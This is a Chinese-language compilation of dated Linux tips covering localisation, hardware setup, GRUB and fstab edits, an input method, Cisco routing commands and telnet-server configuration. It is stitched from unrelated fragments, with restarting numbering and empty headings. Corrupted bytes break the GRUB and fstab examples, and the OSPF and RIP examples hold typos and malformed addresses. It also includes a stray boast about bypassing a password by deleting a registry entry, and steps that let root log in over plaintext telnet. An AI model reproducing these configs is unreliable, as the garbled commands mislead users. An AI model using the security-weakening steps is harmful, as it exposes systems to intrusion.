　　1. 下载RPM软件包: ftp://ftp.redhat.com/pub/code/rpm/rpm-2.3.11.tar.gz

　　 四 、如何在Windows系统中查看Linux的文件

　　通过使用装载命令mount，我们能够在Linux中轻松地查阅、使用Windows的文件。俗话说有来有往嘛，我们当然也希望在Windows中能看到Linux的文件。可Windows可不像Linux那么友好，并未备有与Linux沟通的工具，怎么办呢？别急，网络上有个小工具叫Linuxdos，不到500K，运行在Windows下，专用于查看Linux的文件。运行之后，你可以选择驱动器，然后它就像资源管理器一样列出Linux的文件系统。


　　 五、如何汉化Linux

　　Linux的母语是英文，所以满屏幕都是“英国老鼠”，用起来特不方便，如果想输入中文更没辙。不过现在的中国软件人员可谓人才辈出，已经为Linux的汉化提供了全面的解决方案。

　　1.中文模拟终端chdrv

　　首先，总得让Linux能显示中文吧！chdrv是在命令行下的中文模拟终端，也就是说，只要你装上了它，你就可以在Linux的命令行状态下显示和输入汉字了。chdrv启动后在tty7（用Ctrl+Alt+F7）建立一个虚拟终端，用户在tty7上登录后就可以使用它提供的中文支持。tty1到tty6不会受到它的影响。
　　如果你能找到RPM格式的安装包，就可以轻松地使用RPM安装程序安装它。否则你可以

　　到ftp://ftp.ihep.ac.cn/pub/chinese/system分别取得 chdrv 的已编译的chdrvbin-0.23.gb.tar.gz和

　　字体文件chdrvfont.tar.gz。然后用root登录，依次执行以下命令:
　　tar xvzf chdrvbin-0.23.gb.tar.gz 将编译好的chdrv解压到chdrv-0.23.gb目录
　　mv chdrvfont.tar.gz chdrv-0.23.gb/ 将字体文件移到chdrv-0.23.gb目录
　　cd chdrv-0.23.gb 进入此目录
　　./installbin 运行安装文件

　　2.中文输入服务器xcin

　　如果你常在X-Window中使用Linux，一定试试用XCIN来解决中文输入的问题。XCIN 是Xwindow Chinese INput的缩写，是一个在X-Window模式下运行的中文输入系统，安装它后，X-Window的所有终端都将提供中文服务。

　　你可从ftp://ftp.ihep.ac.cn/pub/chinese/system/xcingb-2.2.tar.gz取得GB码版的XCIN文件包。然后

　　用root登录，依次执行以下命令：
　　tar xzvf xcingb-2.2.tar.gz　 解压缩
　　cd xcingb-2.2　　　　　　　　 进入目录
　　./configure　　　　　　　　　 修改安装选项
　　make　　　　　　　　　　　　 编译
　　make install　　　　　　　　　 安装
　　同样，如果你能找到该软件的RPM安装版，可以用RPM来安装。
　　到此为止，我们已经介绍了在命令行下和X-Window中使用中文的方法。可是在文本编辑软件中依然只能显示中文，却无法输入汉字。要解决这个问题必须自己动手修改两个地方:

　　1） 为不同shell设置

　　若使用Bash Shell:在 /etc/profile 增加下面的内容:
　　stty cs8 -istrip
　　stty pass8
　　export LANG=C
　　export LC_CTYPE=iso-8859-1
　　若使用Tcsh Shell:在 /etc/csh.login 或 /etc/csh.cshrc 增加设定如下:
　　stty cs8 -istrip
　　stty pass8
　　setenv LANG C
　　setenv LC_CTYPE iso-8859-1

　　2） 在自己主目录下的.inputrc文件中增加下面的内容：

　　set convert-meta off
　　set output-meta on

　　3.中文的窗口管理器 C-fvwm95

　　fvwm95就像是Linux英文Win95，中国的Linux用户一直期望有一天能在中文的窗口下使用Linux。这一愿望现在终于成为现实。中国科学院高能物理研究所计算中心的于明俭先生将fvwm95作了汉化，我们终于可以

　　将fvwm95上那些讨厌的英文换成汉字了！大家可以到ftp.ihep.ac.cn/pub/chinese/packages/中下载汉化了的fvwm95的源代码。它所用的字库也可以在ftp.ihep.ac.cn/pub/chinese/fonts/pcf/中取得。下载文件中附带了安装说明。

　　4.下载BluePoint Linux Star Preview（蓝点预览版）

　　 蓝点预览版基于Red Hat，内含：中文内核(kernel)；控制台中文显示/输入；中文Xserver(CXWIN 0.6)，X的中文显示/输入；汉化Message和相应库文件，经过中文化和本地化处理的NLS message和库文件。

　　 a. 中文内核

　　 1. 性能卓越, 内核实现中文支持，占用资源极少，速度极快.

　　 2. 多语言支持， 同屏显示多内码(GB/BIG5).

　　 3. 兼容性极好，内核兼容上层应用程序，最彻底的解决办法.

　　 4. 支持高分辨率, 完全取决与用户自己的硬件限制.

　　 5. 支持各种字体，支持简繁字体共14种.

　　 6. 热键切换语言环境(GB/BIG5/EN).


　　 b. 中文Xserver

　　 1. 兼容性好，至少95%的纯西文应用软件可以支持中文处理.

　　 2. 内置输入和显示支持，使用非常方便,无须另外安装输入模块.

　　 3. TTF字库支持.

　　 4. 支持GB/BIG5内码.

　　 c. 汉化Message和相应库文件

　　 1. 提示中文化，开机、关机和常用软件的消息提示全部中文显示。


　　 如果需要安装中文xwindow和输入法,则需要下载star-cxwin.tar.gz. 如果需要安装中文控制台及语言环

　　境, 则需要下载star-zhcon.tar.gz 如果需要在控制台上使用24点阵汉字库, 请下载star-font24.tar.gz 注

　　意: 别忘了下载Install安装脚本! 在安装前请仔细阅读README和 常见问题问答!

　　 安装方法

　　 1) 创建一个目录, 将所有下载来的文件放在里面.
　　 2) 以root身份执行安装脚本: # bash Install
　　 3) 安装脚本会先检查系统的配置,还会自动搜索TTF字库, 接下来就是对旧配置文件 进行备份, 最后

　　开始安装.
　　 4) 完成安装, 如果安装了中文控制台环境, 则需要重新启动.

六、如何设置声卡

　　不用我说，这可是十分要紧的工作！不过如果你安装了RED HAT Linux，则这项工作就简单了！

　　用root登录系统，运行/usr/sbin/sndconfig。出现选择声卡类型的画面。一般声卡可以选取Sound Blaster 。

　　选完声卡后再设置有关的资源。用TAB键结合方向键作出选择后，按OK，如果听到Linus（Linux的创始人）说话的声音，就说明声卡设置成功了。真像老式DOS游戏的声卡设置……


　　 七、如何设置显卡

　　 要设置好你的显卡，首先，要知道你的显卡的型号，是什么公司出的，什么样的类型的显卡，显存有

　　几MB，还要知道显卡的显示芯片是什么类型的，是ALG2302的，还是SIS6326的，

　　还是Savage3D的，等；然后，在超级用户的权限下，你可以运行界面比较友好的Xconfigurator工具，

　　这里的X记住一定要大写的，一步一步跟着指导来选择，应该不是很难的，当选择你的显卡的芯片的时钟时，

　　不用选择它，让测试程序自动检查；最后，

　　还要知道你的显示器的类型，是VGA的，还是SVGA的，以及水平和垂直分辩率。你还可以运行界面不友好的xfree86，如果你比较精通Linux的话，用xfree86命令配置的X Windows效果比Xconfigurator好很多的。界面最友好的，当属XF86Setup工具，若你有安装这个工具的话，不妨就用这个工具来设置你的显卡吧。

　　 八、如何设置网卡

　　 九、如何播放CD音乐

　　声卡设置好了，可以在光驱中插入一张CD，用装载命令mount将光盘载入，然后输入cdp命令就可以播放了。在屏幕上可以看到CD的音轨清单，小键盘的9是播放，7是停止，6进到下一音轨，4退到前一音轨，0退出播放程序，2弹出CD，8是暂停。如果是在X-Window中，可以用xplaycd播放CD，这是一个有图形界面的播放器，按钮及功能一目了然，这里就不多说了。


　　 10、如何播放VCD影碟

　　 11、如何拨号上网

　　 12、Linux下能玩游戏吗

　　光盘中有bsd-games-2.1-3.src.rpm文件包，用RPM命令进行安装，然后到安装目录中去找游戏吧。不过

　　这些游戏都不够精致，如果你想玩好的，就须要进入X-Window，acm是空战模拟游戏，paradise和xpilot是联

　　网战斗游戏，xdemineur是挖地雷（没想到吧），xjewel是俄罗斯方块，xboard是国际象棋，xpat2是扑克牌游戏，xboing是弹珠台游戏，还有Doom——大名鼎鼎的第一人称射击游戏！这些游戏有的可以直接调出，有的须要用RPM命令安装。所有的RPM包都在安装光盘中的srpms目录下，自己去看看吧。

　　 十.用xvidtune调整你的显示器

　　 大家会发现装了linux之后在windows下用的好好的显示器有时进到linux的xwindows里后就歪掉了，调整好之后回到windows后windows的桌面也外调了，来回启动系统每次都要调整很麻烦的，这里介绍一个办法一劳永逸j进入linux启动x在xterm里执行xvidtune,会弹出这个软件的窗口，点Auto然后点Left,Right等按钮调整你的显示器到最佳的位置，然后点界面上的Show按钮会得到类似这样的输出：

　　 "1152x864" 121.50 1152 1232 1360 1568 864 865 868 911 +hsync -vsync

　　 然后退出这个软件，修改你的/etc/X11/XF86Config-4文件在
　　 Section "Monitor"
　　 Identifier "AS 786T"
　　 VendorName "Unknown"
　　 ModelName "Unknown"
　　 HorizSync 30 - 87
　　 VertRefresh 50 - 160
　　 Option "dpms"
　　 EndSection
　　 里加上刚才的输出，我的是：
　 Section "Monitor"
　　 Identifier "AS 786T"
　　 VendorName "Unknown"
　　 ModelName "Unknown"
　　 HorizSync 30 - 87
　　 VertRefresh 50 - 160
　　 Modeline "1152x864" 121.50 1152 1232 1360 1568 864 865 868 911 +hsync -vsync
　　 Option "dpms"
　　 EndSection
　　 保存然后重起试试看吧

　　 十一.问：我的机器是windows和linux双系统，如何改变grub默认启动的系统？


　　 答：这需要修改/boot/grub/grub.conf。举一个例子你就明白了。假设你的/boot/grub/grub.conf是这样子的：


　　default=0
　　timeout=10
　　splashimage=(hd0,7)/grub/splash.xpm.gz
　　title Red Hat Linux (2.4.18-14)
　　root (hd0,7)
　　kernel /vmlinuz-2.4.18-14 ro root=LABEL=/
　　initrd /initrd-2.4.18-14.img
　　title DOS
　　rootnoverify (hd0,0)
　　chainloader +??牴????
?1


　　那么你的grub会默认启动Red Hat Linux (2.4.18-14)这个系统，把default=0改成default=1，那么grub会

　　默认启动DOS这个系统。注意，这里的要点是：你想默认启动第n个title所指的系统，那么default应该是

　　等于n-1

　　 十二.问：我的文本控制台怎么总是出现乱码呢？

　　 答：这是因为你安装了中文支持的缘故。解决的方法是安装一个zhcon(一个快速地外挂式CJK(中文/日文/韩文)的多内码平台)，我把他放在附件中提供大家下载。关于zhcon的更进一步的消息，大家可以到他的官方主页zhcon.gnuchina.org查看。安装和使用请参考这个连接http://hepg.sdu.edu.cn/Service/tips/zhcon_manual.html

　　zhcon下载连接：http://zhcon.gnuchina.org/download/...on-0.2.1.tar.gz

　　 十三.问：我在安装一个软件的时候，提示我缺少一个.so文件，安装无法继续，怎么办？

　　 答：.so文件就像windows中的.dll文件一样，是库文件。一个程序的正常安装和运行需要特定的库文件的支持。所以你需要去找到包含这个.so的包装上。去www.rpmfind.net用你缺的那个.so文件?rpm包

　　 十四.我访问windows分区时发现所有windows分区中的文件和文件夹名中的中文全变成问号，怎么办？

　　 答：在第三贴中我们讲解了通过编辑/etc/fstab实现在linux中访问windows的fat32分区。同样，我们可以通过进一步修改/etc/fstab来实现中文文件名显示。只要把/dev/hda1 /mnt/c vfat default 0 0中

　　的default全改为iocharset=cp936就行了。

　　 十五.我的rh8.0中的XMMS不好使，不能播放MP3，怎么办？

　　答：这是因为rh公司怕别人告他侵权，所以在rh8.0中去掉了XMMS对MP3的支持，8.0以前的版本都是好使的。

　　在8.0中要解决也很简单，装一个插件就行了。这个插件我放在本贴的附件里，rpm格式，经winrar压缩

　　附件: http://www.chinalinuxpub.com/vbbfor...s=&postid=86299

　　 十六.问：我在linux中怎样才能使用windows分区呢？


　　 答：先说一点背景知识 。linux支持很多种文件系统，包括windows的fat32和ntfs。对fat32的支持已经很好，可以直接使用，而对ntfs的支持还不是太好，只能读，而写是极危险的，并且对ntfs的支持不是默认的，也就是说你想要使用ntfs的话，需要重新编译内核。鉴于重编内核对于新手的复杂性，这里只讲解使用fat32分区的方法 下面给出上述问题的两种解决方案：1.在安装系统（linux），进行到分区选择挂载点时，你可以建立几个挂载点，如/mnt/c，/mnt/d等，然后选择你的windows fat32分区，把它们分别挂载到前面建立的挂载点即可。（注意，正如前面所说，在这里你不能把一个ntfs分区挂载到一个挂载点，应为ntfs不是默认支持的。）这样你装好系统后就能直接使用你的windows fat32分区了。例如，你把windows的c盘（linux中的/dev/hda1）挂载到/mnt/c，那么你就能在/mnt/c目录中找到你的c盘中的全部数据。2. 如果你在安装系统时没有像方案1所说的那样挂载上你的fat32分区，没关系，仍然能够很方便的解决这个问题。首先，用一个文本编辑器（如vi）打开/etc/fstab，在文件的最后加入类似如下的几行/dev/hda1 /mnt/c vfat default 0 0你所要做的修改就是，把/dev/hda1改成你要挂载的fat32分区在linux中的设备号，把/mnt/c改成相应的挂载点即可。注意，挂载点就是一个目录，这个目录要事先建立。举一个例子，我有三个fat32分区，在windows中是c,d,e盘，在linux中的设备号分别为/dev/hda1,/dev/hda5,/dev/hda6。那么我就要先建立3个挂载点，如/mnt/c,/mnt/d,/mnt/e，然后在/etc/fstab中加上这么几行：
　　/dev/hda1 /mnt/c vfat default 0 0
　　/dev/hda5 /mnt/d vfat default 0 0
　　/dev/hda6 /mnt/e vfat default 0 0
　　保存一下退出编辑器。这样以后你重启??牴????
?机器后就能直接使用c,d,e这三个fat32格式的windows分区了

　　 十七.问：我的机器重装windows后，开机启动就直接进入了windows，原来的linux进不去了，怎么办？

　　答：这是由于windows的霸道。重装windows后，windows重写了你的mbr，覆盖掉了grub。解决方法

　　很简单：用你的linux第一张安装盘引导进入linx rescue模式（如何进入？你注意一下系统的提示信息

　　就知道了），执行下面两条命令就可以了chroot /mnt/sysimage #改变你的根目录grub-install /dev/hda #安装grub到mbr

　　 十八.问：我的linux开机直接进入文本界面，怎样才能让它默认进入图形界面？

　　 答：修改/etc/inittab文件，其中有一行id:3:initdefault，意思是说开机默认进入运行级别3（多用户的文本界面），把它改成id:5:initdefault，既开机默认进入运行级别5（多用户的图形界面）。这样就行了。

　　 十九.如何同时启动多个x

　　 以前的帖子,估计很多人没看过,贴出来温习一下Linux里的X-Windows以其独特的面貌和强大的功能吸引了很多原先对linux不感兴趣的人，特别是KDE和GNOME，功能强大不说，而且自带了很多很棒的软件，界面非常友好，很适合于初学者。

　　 下面告诉大家一个同时启动6个X的小技巧：

　　在~/.bashrc中加入 以下几行：

　　alias X=startx -- -bpp 32 -quiet&

　　alias X1=startx -- :1 -bpp 32 -quiet&

　　alias X2=startx -- :2 -bpp 32 -quiet&

　　alias X3=startx -- :3 -bpp 32 -quiet&

　　alias X4=startx -- :4 -bpp 32 -quiet&

　　alias X5=startx -- :5 -bpp 32 -quiet&

　　其中32是显示器的色彩深度,你应该根据自己的实际情况设置。

　　之后运行

　　# bash

　　使改变生效，以后只要依次运行X,X1,X2,X3,X4,X5就可以启动6个X-Windows了。

　　 二十.装了rpm的postgresql之后启动

　　/etc/init.d/postgresql start是不能启动postgresql的tcp/ip连接支持的,所以打/etc/init.d/postgresql这个文件把su -l postgres -s /bin/sh -c "/usr/bin/pg_ctl -D   $PGDATA -p /usr/bin/postmaster start > /dev/null2>&1" < /dev/null改为:
　　su -l postgres -s /bin/sh -c "/usr/bin/pg_ctl -o -o -F -i -w -D   $PGDATA - /usr/bin/postmaster start > /dev/null2>&1" < /dev/null

　　 这样就可以启动数据库的tcp/ip链接了

一时好奇，在注册表中挖出加密的字符串，直接删之，密码为空，直接回车就进入了！哈哈！

要得到密码，将其加密字符转换下就OK了！

搞了一上午也没有装上，最后查了下资料，才发现fcitx自带的SPEC文件过于简单，生成的RPM包在安装之后也无法立即使用，还需要手工配置.
懒的去配置。最后还是选择了陈桥五笔.

down:http://www.linuxfans.org/nuke/modules.php?name=Site_Downloads&op=geninfo&did=3125

安装步骤:
tar -zxvf chznwb-1.0.tar.gz
解压后，cd znwb,
make
chinput

就装好了，需要重新启动电脑才能调出来！ 和lumaqq也很兼容，不会出现假死情况！

一.1.RIP 协 议 
　　1.有关命令 
　　全局设置 
　　指定使用RIP 协 议 router rip 
　　路由设置 
　　指定与该路由器相连的网络 network network 
　　指定与该路由器相邻的节点地址 neighbor ip-address 
　　
2.举例 


　　　 
　　Router1: 
　　router rip 
　　--network 192.200.10.0 
　　--network 192.20.10.0 
　　--neihbor 192.200.10.2 
　　二、IGRP 协 议 
　　1.有关命令 
　　全局设置 
　　指定使用IGRP 协议 router igrp 
　　autonomous-system 
　　
　　路由设置 
　　指定与该路由器相连的网络 network network 
　　
　　2.举 例 


　　　 
　　Router1: 
　　-- router igrp 200 
　　-- network 192.200.10.0 
　　-- network 192.20.10.0 
　　三、OSPF 协 议 
　　1.有关命令 
　　全局设置 
　　指定使用OSPF 协议 router ospf process-id 
　　
　　路由设置 
　　指定与该路由器相连的网络network 
　　address wildcard-mask area area-id 
　　指定与该路由器相邻的节点地址neighbor ip-address 
　　
　　2.举例 


　　　 
　　Router1: 
　　-- router ospf 200 
　　-- network 192.200.10.0.0.0.0.255 area1 
　　-- network 192.200.20.0.0.0.0.255 area2 
　　-- netghbor 192.200.10.2 
　　-- neighbor 192.200.20.2 
　　四、IPX 协议设置 
　　IPX 协议与IP 协议是两种不同的网络层协议，它们的路由协议也不一样，IPX 的路由协议不象IP的路由协议那样丰富，所以设置起来比较简单。但IPX协议在以太网上运行时必须指定封装形式。 
　　
　　1.有关命令 
　　全局设置 
　　启动IPX 路由 ipx routing 
　　
　　端口设置 
　　设置IPX 网络及以太网封装形式 ipx network network [encapsulation encapsulation-type] 
　　2.举例 


　　  
　　Router1: 
　　-- ipx routing 
　　-- interface ethernet0 
　　-- ipx network 1a encapsulation sap 
　　-- interface serial0 
　　-- ipx network 3a00

信息来源：赛迪网


Telnet服务的配置步骤如下:

一、安装telnet软件包(通常要两个）

1、 telnet-client (或 telnet)，这个软件包提供的是 telnet 客户端程序；

2、 telnet-server ，这个软件包提供的是 telnet 服务器端程序；

安装之前先检测是否这些软件包已安装，方法如下：

[root@wljs root]#rpm –q telnet或[root@wljs root]#rpm –q telnet-client

[root@wljs root]#rpm –q telnet-server

如果没有检测到软件包，需要进行安装，red hat linux 9默认已安装了telnet软件包，一般只要安装telnet-server软件包。

1、在red hat linux 9的安装盘中获取telnet-server-0.17-25.i386.rpm软件包。

2、安装软件包

[root@wljs root]#rpm –i telnet-server-0.17-25.i386.rpm

二、启动telnet服务

1、开启服务

方法一：使用ntsysv,在出现的窗口之中，将 telnet前面*加上，然后按下 OK 。

方法二：编辑 /etc/xinetd.d/telnet

[root@wljs root]# vi /etc/xinetd.d/telnet

找到 disable = yes 将 yes 改成 no 。

2、激活服务

[root@wljs root]# service xinetd restart

三、测试服务

[root@wljs root]#telnet ip(或者hostname）

如果配置正确，系统提示输入远程机器的用户名和密码

Login:

Password:

注：默认只允许普通用户

四、设置telnet端口

#vi /etc/services

进入编辑模式后查找telnet(vi编辑方式下输入/telnet)

会找到如下内容：

telnet 23/tcp

telnet 23/udp

将23修改成未使用的端口号(如：2000)，退出vi，重启telnet服务，telnet默认端口号就被修改了。

五、Telnet服务限制

telnet是明文传送口令和数据的，如果你对其默认的设置不满意，有必要对其服务范围进行限制。假设你的主机的ip是210.45.160.17，就可以按如下方式设置了，^_^!

#vi /etc/xinetd.d/telnet

service telnet

{

disable = no #激活 telnet 服务,no

bind = 210.45.160.17 #your ip

only_from = 210.45.0.0/16 #只允许 210.45.0.0 ~ 210.45.255.255 这个网段进入

only_from = .edu.cn #只有教育网才能进入！

no_access = 210.45.160.{115,116} #这两个ip不可登陆

access_times= 8:00-12:00 20:00-23:59 # 每天只有这两个时间段开放服务

......

}

六、Telnet root用户的登入

telnet 不是很安全，默认的情况之下不允许 root 以 telnet 进入 Linux 主机 。若要允许root用户登入，可用下列方法：

[root @wljs /root]# vi /etc/pam.d/login

#auth required pam_securetty.so #将这一行加上注释！

或

[root@wljs root]# mv /etc/securetty /etc/securetty.bak

这样， root 就可以直接进入 Linux 主机了。不过，建议不要这样做。也可以在普通用户进入后，切换到root用户,拥有root的权限。